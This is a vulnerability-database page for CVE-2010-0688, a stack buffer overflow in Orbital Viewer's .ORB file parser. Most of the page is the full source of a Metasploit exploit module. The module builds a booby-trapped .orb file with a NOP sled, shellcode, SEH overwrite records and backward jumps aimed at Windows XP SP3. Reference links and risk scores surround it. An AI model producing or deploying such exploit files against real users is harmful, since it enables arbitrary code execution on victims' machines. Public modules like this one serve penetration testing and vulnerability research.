Orbital Viewer ORB File Parsing Buffer Overflow

🗓️ 09 Mar 2010 00:00:00Reported by jduckType

packetstorm🔗 packetstormsecurity.com👁 37 Views

Orbital Viewer ORB File Parsing Buffer Overflow. Stack-based buffer overflow in Orbital Viewer when processing .ORB files allows arbitrary code execution.

Reporter	Title	Published	Views	Family All 19
0day.today	Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit	26 Feb 201000:00	–	zdt
Circl	CVE-2010-0688	26 Feb 201000:00	–	circl
Check Point Advisories	Orbitals.com Orbital Viewer .orb Stack Buffer Overflow (CVE-2010-0688)	2 Jan 201000:00	–	checkpoint_advisories
CVE	CVE-2010-0688	19 Mar 201020:00	–	cve
Cvelist	CVE-2010-0688	19 Mar 201020:00	–	cvelist
Exploit DB	Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)	26 Feb 201000:00	–	exploitdb
Exploit DB	Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)	9 Mar 201000:00	–	exploitdb
exploitpack	Orbital Viewer 1.04 - .orb File Local Universal Overflow (SEH)	26 Feb 201000:00	–	exploitpack
Metasploit	Orbital Viewer ORB File Parsing Buffer Overflow	9 Mar 201001:04	–	metasploit
NVD	CVE-2010-0688	19 Mar 201020:30	–	nvd

`##  
# $Id: orbital_viewer_orb.rb 8757 2010-03-09 05:57:22Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Orbital Viewer ORB File Parsing Buffer Overflow',  
'Description' => %q{  
This module exploits a stack-based buffer overflow in David Manthey's  
Orbital Viewer. When processing .ORB files, data is read from file into  
a fixed-size stack buffer using the fscanf function. Since no bounds  
checking is done, a buffer overflow can occur. Attackers can execute  
arbitrary code by convincing their victim to open an ORB file.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'jduck' ],  
'Version' => '$Revision: 8757 $',  
'References' =>  
[  
[ 'BID', '38436' ],  
[ 'OSVDB', '62580' ],  
[ 'CVE', '2010-0688' ],  
[ 'URL', 'http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/' ],  
[ 'URL', 'http://www.exploit-db.com/exploits/11581' ]  
],  
'Payload' =>  
{  
'Space' => 2048,  
'BadChars' => "\x00\x09\x0a\x0d\x20", # \xbd was safe in my test, \x09 was not  
'DisableNops' => true,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Orbital Viewer 1.04 on Windows XP SP3',  
{  
'Ret' => 0x004032a2, # p/p/r in ov.exe v1.0.0.2  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Feb 27 2010',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'The file name.', 'msf.orb']),  
], self.class)  
end  
  
def exploit  
  
# One for double-click  
seh1 = 3968  
# One for DnD and File->Open  
seh2 = seh1 + 2092  
  
sploit = "OrbitalFileV1.0\r\n"  
  
line2 = ''  
nop_count = seh1 - payload.encoded.length  
line2 << make_nops(nop_count)  
line2 << payload.encoded  
  
line2 << generate_seh_record(target.ret)  
distance = seh1 + 8  
line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string  
  
line2 << rand_text_alphanumeric(seh2 - line2.length)  
line2 << generate_seh_record(target.ret)  
distance = seh2 + 8  
line2 << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string  
  
# Crash writing past end of stack...  
line2 << rand_text_alphanumeric(1024) * 20  
  
sploit << line2  
  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
  
file_create(sploit)  
  
end  
  
end  
`

09 Mar 2010 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.67507